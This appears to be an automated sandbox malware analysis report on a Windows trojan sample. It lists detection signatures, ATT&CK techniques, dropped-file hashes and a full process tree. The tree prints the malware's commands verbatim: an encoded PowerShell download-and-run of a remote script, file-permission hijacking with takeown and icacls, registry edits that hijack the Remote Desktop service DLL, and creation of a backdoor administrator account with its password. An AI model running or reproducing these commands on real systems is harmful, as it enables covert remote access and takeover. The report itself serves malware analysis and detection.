6f7c097945c1602bbae27e4664004cf2139e66226f54b9499df311bdab804ebb

Analysis

max time kernel
133s
max time network
102s
platform
windows7_x64
resource
win7v20201028
submitted
06-03-2021 06:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
Size

4.6MB
MD5

d6f9cf363d1cdbf8c076f9198e19df01
SHA1

b70fe14eef9aa33bd33068514e192f259802c5f1
SHA256

6f7c097945c1602bbae27e4664004cf2139e66226f54b9499df311bdab804ebb
SHA512

373962c1533835c6b490310a3a7ae99d6cca22359017499dc9c607a2a06c373a34b55d2ac472c85596f76ac233e87f530ff21cd2b80b916554fbbf6fb7cee1a7

Score

10^/10

discovery exploit persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

11 1592 powershell.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1752 icacls.exe
1580 icacls.exe
1156 icacls.exe
660 icacls.exe
1132 icacls.exe
936 takeown.exe
1948 icacls.exe
1928 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

flow	pid	process
11	1592	powershell.exe

pid	process
1752	icacls.exe
1580	icacls.exe
1156	icacls.exe
660	icacls.exe
1132	icacls.exe
936	takeown.exe
1948	icacls.exe
1928	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

1684
1684
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1752 icacls.exe
1580 icacls.exe
1156 icacls.exe
660 icacls.exe
1132 icacls.exe
936 takeown.exe
1948 icacls.exe
1928 icacls.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
1684
1684

pid	process
1752	icacls.exe
1580	icacls.exe
1156	icacls.exe
660	icacls.exe
1132	icacls.exe
936	takeown.exe
1948	icacls.exe
1928	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 21 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_8048f954-00c4-4aaa-92ee-84ead7524690	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_371edb6c-8b7a-46ad-800f-e6d78207ffe4	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_45f8427b-5b1c-44e1-8c83-04be91aab587	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_d1389b05-44fa-4676-b8ee-91ce7fa78354	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a7a95d55-68e2-4d5c-828a-d1a73576a5a8	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\APPYP0FPWZZZKCR5UWNL.temp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_f58490ab-e1b9-4bca-8007-7cfa440df9d3	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_95055a3e-7a61-488a-bb91-acd6fe70240a	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1efd3225-1527-46a4-a97a-71912cba2f11	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_065cf4c4-45ed-4943-a8a8-36e054e0fdda	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b176a6b9-d075-451a-b5d5-6c52d00c050a	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9e5e481d-15a6-45e2-a1a1-fb5a16e0eead	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exepowershell.exeWMIC.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 5070c3f65512d701	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1608 reg.exe
Runs net.exe

pid	process
1608	reg.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
740	powershell.exe
740	powershell.exe
1508	powershell.exe
1508	powershell.exe
396	powershell.exe
396	powershell.exe
1904	powershell.exe
1904	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
1592	powershell.exe
1592	powershell.exe

Suspicious behavior: LoadsDriver 5 IoCs

Processes:

pid process

468
1684
1684
1684
1684

pid	process
468
1684
1684
1684
1684

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	1508	powershell.exe
Token: SeDebugPrivilege	396	powershell.exe
Token: SeDebugPrivilege	1904	powershell.exe
Token: SeRestorePrivilege	1928	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	572	WMIC.exe
Token: SeAuditPrivilege	572	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	572	WMIC.exe
Token: SeAuditPrivilege	572	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1700	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1700	WMIC.exe
Token: SeAuditPrivilege	1700	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1700	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1700	WMIC.exe
Token: SeAuditPrivilege	1700	WMIC.exe
Token: SeDebugPrivilege	1592	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exepowershell.execsc.execsc.exenet.exe

description	pid	process	target process
PID 2008 wrote to memory of 740	2008	SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe	powershell.exe
PID 2008 wrote to memory of 740	2008	SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe	powershell.exe
PID 2008 wrote to memory of 740	2008	SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe	powershell.exe
PID 740 wrote to memory of 572	740	powershell.exe	csc.exe
PID 740 wrote to memory of 572	740	powershell.exe	csc.exe
PID 740 wrote to memory of 572	740	powershell.exe	csc.exe
PID 572 wrote to memory of 688	572	csc.exe	cvtres.exe
PID 572 wrote to memory of 688	572	csc.exe	cvtres.exe
PID 572 wrote to memory of 688	572	csc.exe	cvtres.exe
PID 740 wrote to memory of 760	740	powershell.exe	csc.exe
PID 740 wrote to memory of 760	740	powershell.exe	csc.exe
PID 740 wrote to memory of 760	740	powershell.exe	csc.exe
PID 760 wrote to memory of 1364	760	csc.exe	cvtres.exe
PID 760 wrote to memory of 1364	760	csc.exe	cvtres.exe
PID 760 wrote to memory of 1364	760	csc.exe	cvtres.exe
PID 740 wrote to memory of 1508	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 1508	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 1508	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 396	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 396	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 396	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 1904	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 1904	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 1904	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 936	740	powershell.exe	takeown.exe
PID 740 wrote to memory of 936	740	powershell.exe	takeown.exe
PID 740 wrote to memory of 936	740	powershell.exe	takeown.exe
PID 740 wrote to memory of 1948	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1948	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1948	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1928	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1928	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1928	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1752	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1752	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1752	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1580	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1580	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1580	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1156	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1156	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1156	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 660	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 660	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 660	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1132	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1132	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1132	740	powershell.exe	icacls.exe
PID 740 wrote to memory of 1208	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1208	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1208	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1608	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1608	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1608	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1508	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1508	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1508	740	powershell.exe	reg.exe
PID 740 wrote to memory of 1908	740	powershell.exe	net.exe
PID 740 wrote to memory of 1908	740	powershell.exe	net.exe
PID 740 wrote to memory of 1908	740	powershell.exe	net.exe
PID 1908 wrote to memory of 688	1908	net.exe	net1.exe
PID 1908 wrote to memory of 688	1908	net.exe	net1.exe
PID 1908 wrote to memory of 688	1908	net.exe	net1.exe
PID 740 wrote to memory of 832	740	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Variant.Bulz.371365.8514.2555.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2008

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\l2dqhxai\l2dqhxai.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:572

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5E27.tmp" "c:\Users\Admin\AppData\Local\Temp\l2dqhxai\CSC4F574D1DB40F4B47834442E9BD3E4D2E.TMP"
4⤵
PID:688

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qm5p2bb2\qm5p2bb2.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES620D.tmp" "c:\Users\Admin\AppData\Local\Temp\qm5p2bb2\CSCDB32768EE8AF42D1B5ADDF297CB6378.TMP"
4⤵
PID:1364

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1904

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:936

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1948

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1928

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1752

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1580

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1156

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:660

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1132

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:1208

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:1608

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:1508

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:1908

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:688

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
PID:832

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
PID:1488

C:\Windows\system32\net.exe
net start rdpdr
5⤵
PID:1176

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1696

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
PID:704

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
PID:396

C:\Windows\system32\net.exe
net start TermService
5⤵
PID:2044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:1708

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:328

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:1144

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc 000000 /del
1⤵
PID:320

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc 000000 /del
2⤵
PID:1368

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
3⤵
PID:660

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc ChzFXn29 /add
1⤵
PID:856

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc ChzFXn29 /add
2⤵
PID:1608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc ChzFXn29 /add
3⤵
PID:292

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
PID:1672

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
2⤵
PID:1364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
3⤵
PID:1924

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
1⤵
PID:688

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
2⤵
PID:1436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" EIDQHRRL$ /ADD
3⤵
PID:1368

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:1208

C:\Windows\system32\net.exe
net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
2⤵
PID:1332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
3⤵
PID:1076

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc ChzFXn29
1⤵
PID:1476

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc ChzFXn29
2⤵
PID:1904

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc ChzFXn29
3⤵
PID:736

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:660

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:572

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:916

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1700

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:1176

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:1368

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1592

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

File Permissions Modification

T1222

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1eab757a-82ac-445b-8371-07e8ad021e06
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2a757b45-445a-4e4b-a4d1-fb28bdbe093c
MD5
faa37917b36371249ac9fcf93317bf97

SHA1
a0f0d84d58ee518d33a69f5f1c343aa921c8ffd4

SHA256
b92f1a891dbe4152a1f834774cc83378d8b4cffb7e344a813219d74ec4084132

SHA512
614d3692e5be7554a72a38af408458254af271eaf6855f322ae07aaa647b1478c7ad13027285c8d9999db3739d65ac85ecfdf3e56acca8484083aa0e31de2198

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_55df2956-72db-4352-af77-3d302af06de6
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_68410ba5-732c-4375-affb-75f29c3f1cde
MD5
2d5cd190b5db0620cd62e3cd6ba1dcd3

SHA1
ff4f229f4fbacccdf11d98c04ba756bda80aac7a

SHA256
ab9aee31b3411bcc5a5fb51e9375777cca79cfb3a532d93ddd98a5673c60571d

SHA512
edb2a46f3ee33b48f8fe0b548c1e7940978d0e4ac90d5090807d8b5c8b1320217e5d66990b1d0a85546acbbaf9b601590d35de87de234da8eafd60d12fdce610

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bdda9c4-72d8-448d-bc6b-59cf8742e7a5
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ba5fc542-3176-46f0-9a67-b1530597df59
MD5
e5b3ba61c3cf07deda462c9b27eb4166

SHA1
b324dad73048be6e27467315f82b7a5c1438a1f9

SHA256
b84fae85b6203a0c8c9db3ba3c050c97d6700e5c9ae27dd31c103ec1bbb02925

SHA512
a5936a098db2e8c0d0231fd97d73cc996ad99897fd64f0e5c6761c44b8eb2db2bff477843d326503e6027c1113da0e8e35f4227195a3cf505c5a374ebe0f67fc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_dd2fdb85-8241-4b95-93ab-0a4518300606
MD5
6f0d509e28be1af95ba237d4f43adab4

SHA1
c665febe79e435843553bee86a6cea731ce6c5e4

SHA256
f545be30e70cd6e1b70e98239219735f6b61c25712720bb1e1738f02be900e7e

SHA512
8dbadc140fd18eb16e2a282e3a0a895299b124850e7b9454a3f24e1cc1c090c5bebfbff5062e8807369e84ed7359e0854722cfd45b9a63681f9fea8c97fab797

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
f9d363e8ccf5f49fe8e8241b4e2a7a63

SHA1
eeb8e7a7aef99c2b15fb7cfe80e3edfa0c85a082

SHA256
95dd304d2734d4ec9f015387c226392171aeb374a29c1501193fd51b6a5c51e1

SHA512
f17ec4a87fe7d2d5f05eda3e75ac0e32d2a8480b2fb819bcf2ebdc3ff5505b5582ab3e9316a356d5604ce5abb77e46c34f0526e1ad86f568e502ff14d1a7ed49

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
09663af87746bc55ccc64d4a6aaeb0e8

SHA1
aa199f2dcb576c6327cc0a2874ff824d80b4cd41

SHA256
